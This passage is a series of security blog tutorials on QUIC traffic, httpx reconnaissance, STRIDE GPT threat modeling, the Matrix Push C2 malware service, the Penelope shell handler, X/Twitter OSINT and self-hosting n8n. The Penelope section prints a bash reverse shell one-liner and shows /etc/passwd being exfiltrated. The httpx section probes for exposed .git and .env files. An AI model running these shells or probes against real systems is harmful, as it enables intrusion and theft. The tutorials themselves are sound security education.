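If you want the probe to fail loudly instead of silently falling back, recent curl builds (7.88.0 and later) also offer a strict variant; Cloudflare runs a public QUIC test host that works well here:

kali> curl --http3-only -I https://cloudflare-quic.com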

Besides that, it’s also useful to see how QUIC traffic looks “in the wild.” One of the easiest ways to do this is by using Wireshark, a popular tool for analyzing network packets. Even though QUIC encrypts most of its payload, Wireshark can still identify QUIC packet types, versions, and some metadata, which helps us understand how a QUIC connection is established.

To start, open Wireshark and visit a website that supports QUIC. Cloudflare is a good example because it widely deploys HTTP/3 and the QUIC protocol. QUIC typically runs over UDP port 443, so the simplest filter to confirm that you are seeing QUIC traffic is:

udp.port == 443

This filter shows all UDP traffic on port 443, which almost always corresponds to QUIC when dealing with modern websites.

QUIC uses different packet types during different stages of the connection. Even though the content is encrypted, Wireshark can still distinguish these packet types.

To show only Initial packets, which are the very first packets exchanged when a client starts a QUIC connection, use:

quic.long.packet_type == 0

Initial packets are part of QUIC’s handshake phase. They are somewhat similar to the “ClientHello” and “ServerHello” messages in TLS, except QUIC embeds the handshake inside the protocol itself.

If you want to view Handshake packets, which continue the cryptographic handshake after the Initial packets, use:

quic.long.packet_type == 2

These packets help complete the secure connection setup before QUIC switches to encrypted “short header” packets for normal data (like HTTP/3 requests and responses).

Also, QUIC has multiple versions, and servers often support more than one. To see packets that use a specific version, try:

quic.version == 0x00000001

This corresponds to QUIC version 1, which is standardized in RFC 9000. By checking which QUIC version appears in the traffic, you can understand what the server supports and whether it is using the standardized version or an older draft version.
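
The same display filters also work from the terminal with tshark, Wireshark's command-line companion. For example, to watch QUIC Initial packets live (adjust the interface name to match your system):

kali> tshark -i eth0 -Y "quic.long.packet_type == 0"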

Summary

QUIC isn’t just an incremental upgrade — it’s a complete reimagining of how modern internet communication should work. While the traditional stack of TCP + TLS + HTTP/2 served us well for many years, it was never designed for the realities of today’s internet: global-scale latency, constantly changing mobile connections, and the growing demand for both high performance and strong security. QUIC was built from the ground up to address these challenges, making it faster, more resilient, and more secure for the modern web.

Keep coming back, aspiring cyberwarriors, as we continue to explore how fundamental protocols of the internet are being rewritten.

Bug Bounty: Get Started with httpx

4 December 2025 at 10:05

Welcome back, aspiring cyberwarriors!

Before we can exploit a target, we need to understand its attack surface completely. This means identifying web servers, discovering hidden endpoints, analyzing response headers, and mapping out the entire web infrastructure. Traditional tools like curl and wget are useful, but they’re slow and cumbersome when you’re dealing with hundreds or thousands of targets. You need something faster and more flexible.

Httpx is a fast and multi-purpose HTTP toolkit developed by ProjectDiscovery that allows running multiple probes using a simple command-line interface. It supports HTTP/1.1, HTTP/2, and can probe for various web technologies, response codes, title extraction, and much more.

In this article, we will explore how to install httpx, how to use it, and how to extract detailed information about a target. We will also cover advanced filtering techniques and discuss how to use this tool effectively. Let’s get rolling!

Step #1 Install Go Programming Language

Httpx is written in Go, so we need to have the Go programming language installed on our system.

To install Go on Kali Linux, use the following command:

kali > sudo apt install golang-go

Once the installation completes, verify it worked by checking the version:

kali > go version

Step #2 Install httpx Using Go

To install httpx, enter the following command:

kali > go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest

The “-v” flag enables verbose output so you can see what’s happening during the installation. The “@latest” tag ensures you’re getting the most recent stable version of httpx. This command will download the source code, compile it, and install the binary in your Go bin directory.

To make sure httpx is accessible from anywhere in your terminal, you need to add the Go bin directory to your PATH if it’s not already there. Check if it’s in your PATH by typing:

kali > echo $PATH

If you don’t see something like “/home/kali/go/bin” in the output, you’ll need to add it. Open your .bashrc or .zshrc file (depending on which shell you use) and add this line:

export PATH=$PATH:~/go/bin

Then reload your shell configuration:

kali > source ~/.bashrc

Now verify that httpx is installed correctly by checking its version:

kali > httpx -version

Step #3 Basic httpx Usage and Probing

Let’s start with some basic httpx usage to understand how the tool works. Httpx is designed to take a list of hosts and probe them to determine if they’re running web servers and extract information about them.

The simplest way to use httpx is to provide a single target directly on the command line. Let’s probe a single domain:

kali> httpx -u "example.com" -probe

This command initiates an HTTP probe on the website. This is useful for quickly checking the availability of the web page.

Now let’s try probing multiple targets at once. Create a file with several domains you want to probe.
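
For example, you can create it with a heredoc (placeholder domains shown; substitute your own targets):

kali > cat << 'EOF' > hosts.txt
example.com
example.org
example.net
EOF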

Now run httpx against this file:

kali > httpx -l hosts.txt -probe

Step #4 Extracting Detailed Information

One of httpx’s most powerful features is its ability to extract detailed information about web servers in a single pass.

Let’s quickly identify what web server is hosting each target:

kali > httpx -l hosts.txt -server

Now let’s extract even more information using multiple flags:

kali> httpx -l hosts.txt -title -tech-detect -status-code -content-length -response-time

This command will extract the page title, detect web technologies, show the HTTP status code, display the content length, and measure the response time.

The “-tech-detect” flag is particularly valuable because it uses Wappalyzer fingerprints to identify the technologies running on each web server. This can reveal content management systems, web frameworks, and other technologies that might have known vulnerabilities.
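
When probing many hosts, you'll usually want to keep these results for later parsing; httpx can write its output as JSON lines to a file:

kali > httpx -l hosts.txt -title -tech-detect -status-code -json -o results.json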

Step #5 Advanced Filtering and Matchers

Filters in httpx allow you to exclude unwanted responses based on specific criteria, such as HTTP status codes or text content.

Let’s say you don’t want to see targets that return a 301 status code. For this purpose, the -filter-code or -fc flag exists. To see the results clearly, I’ve added the -status-code or -sc flag as well:

kali > httpx -l hosts.txt -sc -fc 301

Httpx outputs filtered results without status code 301. Besides that, you can filter “dead” or default/error responses with -filter-error-page or -fep flag.

kali> httpx -l hosts.txt -sc -fep

This flag enables “filter response with ML-based error page detection”. In other words, when you use -fep, httpx tries to detect and filter out responses that look like generic or error pages.

In addition to filters, httpx has matchers. While filters exclude unwanted responses, matchers include only the responses that meet specific criteria. Think of filters as removing noise, and matchers as focusing on exactly what you’re looking for.

For example, let’s output only responses with 200 status code using the -match-code or -mc flag:

kali> httpx -l hosts.txt -status-code -match-code 200

For more advanced filtering, you can use regex patterns to match specific content in the response (-match-regex or -mr flag):

kali> httpx -l hosts.txt -match-regex “admin|login|dashboard”

This will only show targets whose response body contains the words “admin,” “login,” or “dashboard,” helping you quickly identify administrative interfaces or login pages.

Step #6 Probing for Specific Vulnerabilities and Misconfigurations

Httpx can be used to quickly identify common vulnerabilities and misconfigurations across large numbers of targets. While it’s not a full vulnerability scanner, it can detect certain issues that indicate potential security problems.

For example, let’s probe for specific paths that might indicate vulnerabilities or interesting endpoints:

kali > httpx -l targets.txt -path "/admin,/login,/.git,/backup,/.env"

The -path flag, as the name suggests, tells httpx to probe specific paths on each target.

Another useful technique is probing for different HTTP methods:

kali > httpx -l targets.txt -sc -method -x all

In the command above, the -method flag is used to display HTTP request method, and -x all to probe all of these methods.

Summary

Traditional HTTP probing tools are too slow and limited for the kind of large-scale reconnaissance that modern bug bounty and pentesting demands. Httpx provides a fast, flexible, and powerful solution that’s specifically designed for security researchers who need to quickly analyze hundreds or thousands of web targets while extracting comprehensive information about each one.

In this article, we covered how to install httpx, walked through basic and advanced usage examples, and shared ideas on how httpx might be used for vulnerability detection. The tool is genuinely fast and can significantly boost your productivity, whether you're conducting bug bounty hunting or web application security testing. Check it out; it may earn a place in your cyberwarrior toolbox.

Using Artificial Intelligence (AI) in Cybersecurity: Automate Threat Modeling with STRIDE GPT

28 November 2025 at 09:48

Welcome back, aspiring cyberwarriors!

The STRIDE methodology has been the gold standard for systematic threat identification, categorizing threats into Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege. However, applying STRIDE effectively requires not just understanding these categories but also having the experience to identify how they manifest in specific application architectures.

To solve this problem, we have STRIDE GPT. By combining the analytical power of AI with the proven STRIDE methodology, this tool can generate comprehensive threat models, attack trees, and mitigation strategies in minutes rather than hours or days.

In this article, we’ll walk you through how to install STRIDE GPT, check out its features, and get you started using them. Let’s get rolling!

Step #1: Install STRIDE GPT

First, make certain you have Python 3.8 or later installed on your system.

pi> python3 --version

Now, clone the STRIDE GPT repository from GitHub.

pi > git clone https://github.com/mrwadams/stride-gpt.git

pi> cd stride-gpt

Next, install the required Python dependencies.

pi > pip3 install -r requirements.txt --break-system-packages

This installation process may take a few minutes.

Step #2: Configure Your Groq API Key

STRIDE GPT supports multiple AI providers including OpenAI, Anthropic, Google AI, Mistral, and Groq, as well as local hosting options through Ollama and LM Studio Server. In this example, I’ll be using Groq. Groq provides access to models like Llama 3.3 70B, DeepSeek R1, and Qwen3 32B through their Lightning Processing Units, which deliver inference speeds significantly faster than traditional GPU-based solutions. Besides that, Groq’s API is cost-effective compared to proprietary models.

To use STRIDE GPT with Groq, you need to obtain an API key from Groq. The tool supports loading API keys through environment variables, which is the most secure method for managing credentials. In the stride-gpt directory, you’ll find a file named .env.example. Copy this file to create your own .env file:

pi > cp .env.example .env

Now, open the .env file in your preferred text editor and add the API key.
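
A minimal .env might look like the following; note that GROQ_API_KEY is my assumption for the variable name, so check .env.example for the exact name your version expects (Groq keys typically start with gsk_):

GROQ_API_KEY=gsk_your_key_here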

Step #3: Launch STRIDE GPT

Start the application by running:

pi> python3 -m streamlit run main.py

Streamlit will start a local web server.

Once you copy the URL into your browser, you will see a dashboard similar to the one shown below.

In the STRIDE GPT sidebar, you’ll see a dropdown menu labeled “Select Model Provider”. Click on this dropdown and you’ll see options for OpenAI, Azure OpenAI, Google AI, Mistral AI, Anthropic, Groq, Ollama, and LM Studio Server.

Select “Groq” from this list. The interface will update to show Groq-specific configuration options. You’ll see a field for entering your API key. If you configured the .env file correctly in Step 2, this field should already be populated with your key. If not, you can enter it directly in the interface, though this is less secure as the key will only persist for your current session.

Below the API key field, you’ll see a dropdown for selecting the specific Groq model you want to use. For this tutorial, I selected Llama 3.3 70B.

Step #4: Describe Your Application

Now comes the critical part where you provide information about the application you want to threat model. The quality and comprehensiveness of your threat model depends heavily on the detail you provide in this step.

In the main area of the interface, you’ll see a text box labeled “Describe the application to be modelled”. This is where you provide a description of your application’s architecture, functionality, and security-relevant characteristics.

Let’s work through a practical example. Suppose you’re building a web-based project management application. Here’s the kind of description you should provide:

“This is a web-based project management application built with a React frontend and a Node.js backend API. The application uses JWT tokens for authentication, with tokens stored in HTTP-only cookies. Users can create projects, assign tasks to team members, upload file attachments, and generate reports. The application is internet-facing and accessible to both authenticated users and unauthenticated visitors who can view a limited public project showcase. The backend connects to a PostgreSQL database that stores user credentials, project data, task information, and file metadata. Actual file uploads are stored in an AWS S3 bucket. The application processes sensitive data including user email addresses, project details that may contain confidential business information, and file attachments that could contain proprietary documents. The application implements role-based access control with three roles: Admin, Project Manager, and Team Member. Admins can manage users and system settings, Project Managers can create and manage projects, and Team Members can view assigned tasks and update their status.”

The more specific you are, the more targeted and actionable your threat model will be.

Besides that, near the application description field, you’ll see several dropdowns that help STRIDE GPT understand your application’s security context.

Step #5: Generate Your Threat Model

With all the configuration complete and your application described, you’re ready to generate your threat model. Look for a button labeled “Generate Threat Model” and click it.

Once complete, you’ll see a comprehensive threat model organized by the STRIDE categories. For each category, the model will identify specific threats relevant to your application. Let’s look at what you might see for our project management application example:

Each threat includes a detailed description explaining how the attack could be carried out and what the impact would be.

Step #6: Generate an Attack Tree

Beyond the basic threat model, STRIDE GPT can generate attack trees that visualize how an attacker might chain multiple vulnerabilities together to achieve a specific objective.

The tool generates these attack trees in Mermaid diagram format, which renders as an interactive visual diagram directly in your browser.

Step #7: Review DREAD Risk Scores

STRIDE GPT implements the DREAD risk scoring model to help you prioritize which threats to address first.

The tool will analyze each threat and assign scores from 1 to 10 for five factors:

Damage: How severe would the impact be if the threat were exploited?

Reproducibility: How easy is it to reproduce the attack?

Exploitability: How much effort and skill would be required to exploit the vulnerability?

Affected Users: How many users would be impacted?

Discoverability: How easy is it for an attacker to discover the vulnerability?

The DREAD assessment appears in a table format showing each threat, its individual factor scores, and its overall risk score.

Step #8: Generate Mitigation Strategies

Identifying threats is only half the battle. You also need actionable guidance on how to address them. STRIDE GPT includes a feature to generate specific mitigation strategies for each identified threat.

Look for a button labeled “Mitigations” and click it.

These mitigation strategies are specific to your application’s architecture and the threats identified. They’re not generic security advice but targeted recommendations based on the actual risks in your system.

Step #9: Generate Gherkin Test Cases

One of the most innovative features of STRIDE GPT is its ability to generate Gherkin test cases based on the identified threats. Gherkin is a business-readable, domain-specific language used in Behavior-Driven Development to describe software behaviors without detailing how that behavior is implemented. These test cases can be integrated into your automated testing pipeline to ensure that the mitigations you implement actually work.

Look for a button labeled “Generate Test Cases”. When you click it, STRIDE GPT will create Gherkin scenarios for each major threat.

Summary

Traditional threat modeling takes a lot of time and requires experts, which stops many organizations from doing it well. STRIDE GPT makes threat modeling easier for everyone by using AI to automate the analysis while keeping the quality of the proven STRIDE method.

In this article, we checked out STRIDE GPT and went over its main features. No matter if you’re protecting a basic web app or a complicated microservices setup, STRIDE GPT gives you the analytical tools you need to spot and tackle security threats in a straightforward way.

Command and Control (C2): Using Browser Notifications as a Weapon

26 November 2025 at 10:16

Welcome back, my aspiring hackers!

Nowadays, we often discuss the importance of protecting our systems from malware and sophisticated attacks. We install antivirus software, configure firewalls, and maintain vigilant security practices. But what happens when the attack vector isn’t a malicious file or a network exploit, but rather a legitimate browser feature you’ve been trusting?

This is precisely the threat posed by a new command-and-control platform called Matrix Push C2. This browser-native, fileless framework leverages push notifications, fake alerts, and link redirects to target victims. The entire attack occurs through your web browser, without first infecting your system through traditional means.

In this article, we will explore the architecture of browser-based attacks and investigate how Matrix Push C2 weaponizes it. Let’s get rolling!

The Anatomy of a Browser-Based Attack

Matrix Push C2 abuses the web push notification system, a legitimate browser feature that websites use to send updates and alerts to users who have opted in. Attackers first trick users into allowing browser notifications through social engineering on malicious or compromised websites.

Once a user subscribes to the attacker’s notifications, the attacker can push out fake error messages or security alerts at will that look scarily real. These messages appear as if they are from the operating system or trusted software, complete with official-sounding titles and icons.

The fake alerts might warn about suspicious logins to your accounts, claim that your browser needs an urgent security update, or suggest that your system has been compromised and requires immediate action. Each notification includes a convenient “Verify” or “Update” button that, when clicked, takes the victim to a bogus site controlled by the attackers. This site might be a phishing page designed to steal credentials, or it might attempt to trick you into downloading actual malware onto your system. Because this whole interaction is happening through the browser’s notification system, no traditional malware file needs to be present on the system initially. It’s a fileless technique that operates entirely within the trusted confines of your web browser.

Inside the Attacker’s Command Center

Matrix Push C2 is offered as a malware-as-a-service kit to other threat actors, sold directly through crimeware channels, typically via Telegram and cybercrime forums. The pricing structure follows a tiered subscription model that makes it accessible to criminals at various levels of sophistication. According to the security firm BlackFog, Matrix Push C2 costs approximately $150 for one month, $405 for three months, $765 for six months, and $1,500 for a full year. Payments are accepted in cryptocurrency, and buyers communicate directly with the operator for access.

From the attacker’s perspective, the interface is intuitive. The campaign dashboard displays metrics like total clients, delivery success rates, and notification interaction statistics.

Source: BlackFog

As soon as a browser is enlisted by accepting the push notification subscription, it reports data back to the command-and-control server.

Source: BlackFog

Matrix Push C2 can detect the presence of browser extensions, including cryptocurrency wallets like MetaMask, identify the device type and operating system, and track user interactions with notifications. Essentially, as soon as the victim permits the notifications, the attacker gains a telemetry feed from that browser session.

Social Engineering at Scale

The core of the attack is social engineering, and Matrix Push C2 comes loaded with configurable templates to maximize the credibility of its fake messages. Attackers can easily theme their phishing notifications and landing pages to impersonate well-known companies and services. The platform includes pre-built templates for brands such as MetaMask, Netflix, Cloudflare, PayPal, and TikTok, each designed to look like a legitimate notification or security page from those providers.

Source: BlackFog

Because these notifications appear in the official notification area of the device, users may assume their own system or applications generated the alert.

Defending Against Browser-Based Command and Control

As cyberwarriors, we must adapt our defensive strategies to account for this new attack vector. The first line of defense is user education and awareness. Users need to understand that browser notification permission requests should be treated with the same skepticism as requests to download and run executable files. Just because a website asks for notification permissions doesn’t mean you should grant them. In fact, most legitimate websites function perfectly well without push notifications, and the feature is often more of an annoyance than a benefit. If you believe that your team needs to update their skills for current and upcoming threats, consider our recently published Security Awareness and Risk Management training.

Beyond user awareness, technical controls can help mitigate this threat. Browser policies in enterprise environments can be configured to block notification permissions by default or to whitelist only approved sites. Network security tools can monitor for connections to known malicious notification services or suspicious URL shortening domains.
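
As an illustration, for managed Google Chrome deployments on Linux, a single policy file is enough to block notification prompts outright (a value of 2 for DefaultNotificationsSetting means no site may show notifications; Chromium and other browsers use similar mechanisms):

kali> echo '{ "DefaultNotificationsSetting": 2 }' | sudo tee /etc/opt/chrome/policies/managed/block-notifications.json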

Summary

The fileless, cross-platform nature of this attack makes it particularly dangerous and difficult to detect using traditional security tools. However, by combining user awareness, proper browser configuration, and anti-data exfiltration technology, we can defend against this threat.

In this article, we briefly explored how Matrix Push C2 operates, and it’s a first step in protecting yourself and your organization from this emerging attack vector.

Offensive Security: Get Started with Penelope for Advanced Shell Management

24 November 2025 at 17:02

Welcome back, aspiring cyberwarriors!

In the world of penetration testing and red team operations, one of the most critical moments comes after you’ve successfully exploited a target system. You’ve gained initial access, but now you’re stuck with a basic, unstable shell that could drop at any moment. You need to upgrade that shell, manage multiple connections, and maintain persistence without losing your hard-won access.

Traditional methods of shell management are fragmented and inefficient. You might use netcat for catching shells, then manually upgrade them with Python or script commands, manage them in separate terminal windows, and hope you don’t lose track of which shell connects to which target. Or you can use Penelope to handle all those things.

Penelope is a shell handler designed specifically for hackers who demand more from their post-exploitation toolkit. Unlike basic listeners like netcat, Penelope automatically upgrades shells to fully interactive TTYs, manages multiple sessions simultaneously, and provides a centralized interface for controlling all your compromised systems.

In this article, we will install Penelope and explore its core features. Let’s get rolling!

Step #1: Download and Install Penelope

In this tutorial, I will be installing Penelope on my Raspberry Pi 4, but the tool works equally well on any Linux distribution or macOS system with Python 3.6 or higher installed. The installation process is straightforward since Penelope is a Python script.

First, navigate to the GitHub repository and clone the project to your system:

pi> git clone https://github.com/brightio/penelope.git

pi> cd penelope

Once the downloading completes, you can verify that Penelope is ready to use by checking its help menu:

pi> python3 penelope.py -h

You should see a comprehensive help menu displaying all of Penelope’s options and capabilities. This confirms that the tool is properly installed and ready for use.

Step #2: Starting a Basic Listener

The most fundamental use case for Penelope is catching reverse shells from compromised targets. Unlike netcat, which simply listens on a port and displays whatever connects, Penelope manages the incoming connection and prepares it for interactive use.

To start a basic listener on Penelope's default port (4444), execute the following command:

pi> python3 penelope.py

Penelope will start listening on the default port and display a status message indicating it’s ready to receive connections.

Now let’s simulate a compromised target connecting back to your listener.
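
From the "victim" machine (any Linux box in your lab will do), a classic bash reverse shell is enough; replace 10.0.0.5 with your listener's IP address (4444 is Penelope's default port):

target> bash -c 'bash -i >& /dev/tcp/10.0.0.5/4444 0>&1'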

You should see Penelope display information about the new session, including an assigned session ID, the target’s IP address, and the detected operating system. The shell is automatically upgraded to a fully interactive TTY, meaning you now have tab completion, the ability to use text editors like Vim, and proper handling of special characters.

Step #3: Managing Multiple Sessions

Let’s simulate managing multiple targets. In the current session, click F12 to open a menu. There, you can type help for exploring available options.

We’re interested in adding a new listener, so the command will be:

penelope > listeners add -p <port>

Each time a new target connects, Penelope assigns it a unique session ID and adds it to your session list.

To view all active sessions, use the sessions command within Penelope:

penelope > sessions

This displays a table showing all connected targets with their session IDs, IP addresses, and operating systems.

To interact with a specific session, use the session ID. For example, to switch to session 2:

penelope > interact 2

Step #4: Uploading and Downloading Files

File transfer is a constant requirement during penetration testing engagements. You need to upload exploitation tools, download sensitive data, and move files between your attack system and compromised targets. Penelope includes built-in file transfer capabilities that work regardless of what tools are available on the target system.

To upload a file from your attacking system to the target, use the upload command. Let’s say you want to upload a Python script called script.py to the target:

penelope > upload /home/air/Tools/script.py

Downloading files from the target works similarly. Suppose you’ve discovered a sensitive configuration file on the compromised system that you need to exfiltrate:

penelope > download /etc/passwd

Summary

Traditional tools like netcat provide basic listening capabilities but leave you manually managing shell upgrades, juggling terminal windows, and struggling to maintain organized control over your compromised infrastructure. Penelope solves these problems. It provides the control and organization you need to work efficiently and maintain access to your hard-won, compromised systems.

The tool’s automatic upgrade capabilities, multi-session management, built-in file transfer, and session persistence features make it a valuable go-to solution for cyberwarriors. Keep an eye on it—it may find a place in your hacking toolbox.

Open Source Intelligence (OSINT): Strategic Techniques for Finding Info on X (Twitter)

24 November 2025 at 10:34

Welcome back, my aspiring digital investigators!

In the rapidly evolving landscape of open source intelligence, Twitter (now rebranded as X) has long been considered one of the most valuable platforms for gathering real-time information, tracking social movements, and conducting digital investigations. However, the platform’s transformation under Elon Musk’s ownership has fundamentally altered the OSINT landscape, creating unprecedented challenges for investigators who previously relied on third-party tools and API access to conduct their research.

The golden age of Twitter OSINT tools has effectively ended. Applications like Twint, GetOldTweets3, and countless browser extensions that once provided investigators with powerful capabilities to search historical tweets, analyze user networks, and extract metadata have been rendered largely useless by the platform’s new API restrictions and authentication requirements. What was once a treasure trove of accessible data has become a walled garden, forcing OSINT practitioners to adapt their methodologies and embrace more sophisticated, indirect approaches to intelligence gathering.

This fundamental shift represents both a challenge and an opportunity for serious digital investigators. While the days of easily scraping massive datasets are behind us, the platform still contains an enormous wealth of information for those who understand how to access it through alternative means. The key lies in understanding that modern Twitter OSINT is no longer about brute-force data collection, but rather about strategic, targeted analysis using techniques that work within the platform’s new constraints.

Understanding the New Twitter Landscape

The platform’s new monetization model has created distinct user classes with different capabilities and visibility levels. Verified subscribers enjoy enhanced reach, longer post limits, and priority placement in replies and search results. This has created a new dynamic where information from paid accounts often receives more visibility than content from free users, regardless of its accuracy or relevance. For OSINT practitioners, this means understanding these algorithmic biases is essential for comprehensive intelligence gathering.

The removal of legacy verification badges and the introduction of paid verification has also complicated the process of source verification. Previously, blue checkmarks provided a reliable indicator of account authenticity for public figures, journalists, and organizations. Now, anyone willing to pay can obtain verification, making it necessary to develop new methods for assessing source credibility and authenticity.

Content moderation policies have also evolved significantly, with changes in enforcement priorities and community guidelines affecting what information remains visible and accessible. Some previously available content has been removed or restricted, while other types of content that were previously moderated are now more readily accessible. Also, the company updated its terms of service to officially say it uses public tweets to train its AI.

Search Operators

The foundation of effective Twitter OSINT lies in knowing how to craft precise search queries using X’s advanced search operators. These operators allow you to filter and target specific information with remarkable precision.

You can access the advanced search interface through the web version of X, but knowing the operators allows you to craft complex queries directly in the search bar.

Here are some of the most valuable search operators for OSINT purposes:

from:username – Shows tweets only from a specific user

to:username – Shows tweets directed at a specific user

since:YYYY-MM-DD – Shows tweets after a specific date

until:YYYY-MM-DD – Shows tweets before a specific date

near:location within:miles – Shows tweets near a location

filter:links – Shows only tweets containing links

filter:media – Shows only tweets containing media

filter:images – Shows only tweets containing images

filter:videos – Shows only tweets containing videos

filter:verified – Shows only tweets from verified accounts

-filter:replies – Excludes replies from search results

#hashtag – Shows tweets containing a specific hashtag

"exact phrase" – Shows tweets containing an exact phrase

For example, to find tweets from a specific user about cybersecurity posted in the first half of 2024, you could use:

from:username cybersecurity since:2024-01-01 until:2024-06-30

The power of these operators becomes apparent when you combine them. For instance, to find tweets containing images posted near a specific location during a particular event:

near:Moscow within:5mi filter:images since:2023-04-15 until:2023-04-16 drone

This would help you find images shared on X during the drone attack on Moscow.
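Since X's advanced search is ultimately just a URL with a q parameter, you can also generate these queries programmatically and keep them in your case notes. Below is a minimal Python sketch, assuming the standard x.com/search endpoint; the operator strings are the ones listed above:

from urllib.parse import urlencode

def build_x_search_url(*operators: str) -> str:
    """Combine advanced-search operators into an X search URL."""
    query = " ".join(operators)
    # f=live requests the "Latest" tab instead of "Top" results
    return "https://x.com/search?" + urlencode({"q": query, "f": "live"})

# The Moscow example from above, as code
print(build_x_search_url(
    "near:Moscow", "within:5mi", "filter:images",
    "since:2023-04-15", "until:2023-04-16", "drone",
))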

Profile Analysis and Behavioral Intelligence

Every Twitter account leaves digital fingerprints that tell a story far beyond what users intend to reveal.

The Account Creation Time Signature

Account creation patterns often expose coordinated operations with startling precision. During an investigation of a corporate disinformation campaign, researchers discovered 23 accounts created within a 48-hour window in March 2023—all targeting the same pharmaceutical company. The accounts had been carefully aged for six months before activation, but their synchronized birth dates revealed centralized creation despite using different IP addresses and varied profile information.

Username Evolution Archaeology: A cybersecurity firm tracking ransomware operators found that a key player had changed usernames 14 times over two years, but each transition left traces. By documenting the evolution @crypto_expert → @blockchain_dev → @security_researcher → @threat_analyst, investigators revealed the account operator’s attempt to build credibility in different communities while maintaining the same underlying network connections.

Visual Identity Intelligence: Profile image analysis has become remarkably sophisticated. When investigating a suspected foreign influence operation, researchers used reverse image searches to discover that 8 different accounts were using professional headshots from the same stock photography session—but cropped differently to appear unrelated. The original stock photo metadata revealed it was purchased from a server in Eastern Europe, contradicting the accounts’ claims of U.S. residence.

Temporal Behavioral Fingerprinting

Human posting patterns are as unique as fingerprints, and investigators have developed techniques to extract extraordinary intelligence from timing data alone.

Geographic Time Zone Contradictions: Researchers tracking international cybercriminal networks identified coordination patterns across supposedly unrelated accounts. Five accounts claiming to operate from different U.S. cities all showed posting patterns consistent with Central European Time, despite using location-appropriate slang and cultural references. Further analysis revealed they were posting during European business hours while American accounts typically show evening and weekend activity.

Automation Detection Through Micro-Timing: A social media manipulation investigation used precise timestamp analysis to identify bot behavior. Suspected accounts were posting with unusual regularity—exactly every 3 hours and 17 minutes for weeks. Human posting shows natural variation, but these accounts demonstrated algorithmic precision that revealed automated management despite otherwise convincing content.
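You can apply the same micro-timing logic to timestamps you have collected yourself. The Python sketch below is a simplified illustration of the idea: compute the gaps between consecutive posts and flag accounts whose intervals barely vary. The 5% threshold is an arbitrary value chosen for demonstration, not an established standard:

from datetime import datetime, timedelta
from statistics import mean, stdev

def looks_automated(timestamps: list[datetime], cv_threshold: float = 0.05) -> bool:
    """Flag posting patterns with suspiciously low interval variation."""
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    if len(gaps) < 10:  # too little data to judge
        return False
    # Coefficient of variation: stdev relative to the mean gap
    return stdev(gaps) / mean(gaps) < cv_threshold

# An account posting exactly every 3 hours and 17 minutes, like the case above
posts = [datetime(2025, 1, 1) + i * timedelta(hours=3, minutes=17) for i in range(20)]
print(looks_automated(posts))  # True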

Network Archaeology and Relationship Intelligence

Twitter’s social graph remains one of its most valuable intelligence sources, requiring investigators to become expert relationship analysts.

The Early Follower Principle: When investigating anonymous accounts involved in political manipulation, researchers focus on the first 50 followers. These early connections often reveal real identities or organizational affiliations before operators realize they need operational security. In one case, an anonymous political attack account’s early followers included three employees from the same PR firm, revealing the operation’s true source.

Mutual Connection Pattern Analysis: Intelligence analysts investigating foreign interference discovered sophisticated relationship mapping. Suspected accounts showed carefully constructed following patterns—they followed legitimate journalists, activists, and political figures to appear authentic, but also maintained subtle connections to each other through shared follows of obscure accounts that served as coordination signals.

Reply Chain Forensics: A financial fraud investigation revealed coordination through reply pattern analysis. Seven accounts engaged in artificial conversation chains to boost specific investment content. While the conversations appeared natural, timing analysis showed responses occurred within 30-45 seconds consistently—far faster than natural reading and response times for the complex financial content being discussed.

Systematic Documentation and Intelligence Development

The most successful profile analysis investigations employ systematic documentation techniques that build comprehensive intelligence over time rather than relying on single-point assessments.

Behavioral Baseline Establishment: Investigators spend 2-4 weeks establishing normal behavioral patterns before conducting anomaly analysis. This baseline includes posting frequency, engagement patterns, topic preferences, language usage, and network interaction patterns. Deviations from the established baseline can then signal significant developments.

Multi-Vector Correlation Analysis: Advanced investigations combine temporal, linguistic, network, and content analysis to build confidence in their conclusions. Single indicators might suggest possibilities, but convergent evidence from multiple analysis vectors can push confidence above 85%, the point at which intelligence becomes actionable.

Predictive Behavior Modeling: The most sophisticated investigators use historical pattern analysis to predict likely future behaviors and optimal monitoring strategies. Understanding individual behavioral patterns enables investigators to anticipate when targets are most likely to post valuable intelligence or engage in significant activities.

Summary

Modern Twitter OSINT now requires investigators to develop cross-platform correlation skills and collaborative intelligence gathering approaches. While the technical barriers have increased significantly, the platform remains valuable for those who understand how to leverage remaining accessible features through creative, systematic investigation techniques.

To improve your OSINT skills, check out our OSINT Investigator Bundle. You’ll explore both fundamental and advanced techniques and receive an OSINT Certified Investigator Voucher.

Automating Your Digital Life with n8n

21 November 2025 at 10:09

Welcome back, aspiring cyberwarriors!

As you know, there are plenty of automation tools out there, but most of them are closed-source, cloud-only services that charge you per operation and keep your data on their servers. For those of us who value privacy and transparency, these solutions simply won’t do. That’s where n8n comes into the picture – a free, private workflow automation platform that you can self-host on your own infrastructure while maintaining complete control over your data.

In this article, we explore n8n, set it up on a Raspberry Pi, and create a workflow for monitoring security news and sending it to Matrix. Let’s get rolling!

What is n8n?

n8n is a workflow automation platform that combines AI capabilities with business process automation, giving technical teams the flexibility of code with the speed of no-code. The platform uses a visual node-based interface where each node represents a specific action, for example, reading an RSS feed, sending a message, querying a database, or calling an API. When you connect these nodes, you create a workflow that executes automatically based on triggers you define.

With over 400 integrations, native AI capabilities, and a fair-code license, n8n lets you build powerful automation while maintaining full control over your data and deployments.

The Scenario: RSS Feed Monitoring with Matrix Notifications

For this tutorial, we’re going to build a practical workflow that many security professionals and tech enthusiasts need: automatically monitoring RSS feeds from security news sites and threat intelligence sources, then sending new articles directly to a Matrix chat room. Matrix is an open-source, decentralized communication protocol—essentially a privacy-focused alternative to Slack or Discord that you can self-host.

Step #1: Installing n8n on Raspberry Pi

Let’s get started by setting up n8n on your Raspberry Pi. First, we need to install Docker, which is the easiest way to run n8n on a Raspberry Pi. SSH into your Pi and run these commands:

pi> curl -fsSL https://get.docker.com -o get-docker.sh
pi> sudo sh get-docker.sh
pi> sudo usermod -aG docker pi

Log out and back in for the group changes to take effect. Now we can run n8n with Docker in a dedicated directory:

pi> sudo mkdir -p /opt/n8n/data

pi> sudo chown -R 1000:1000 /opt/n8n/data

pi> sudo docker run -d --restart unless-stopped --name n8n \
-p 5678:5678 \
-v /opt/n8n/data:/home/node/.n8n \
-e N8N_SECURE_COOKIE=false \
n8nio/n8n

